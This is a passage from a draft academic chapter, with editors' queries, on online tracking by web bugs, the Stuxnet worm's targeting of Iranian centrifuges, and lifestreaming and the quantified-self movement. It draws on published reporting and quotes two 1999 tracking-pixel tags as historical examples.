&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
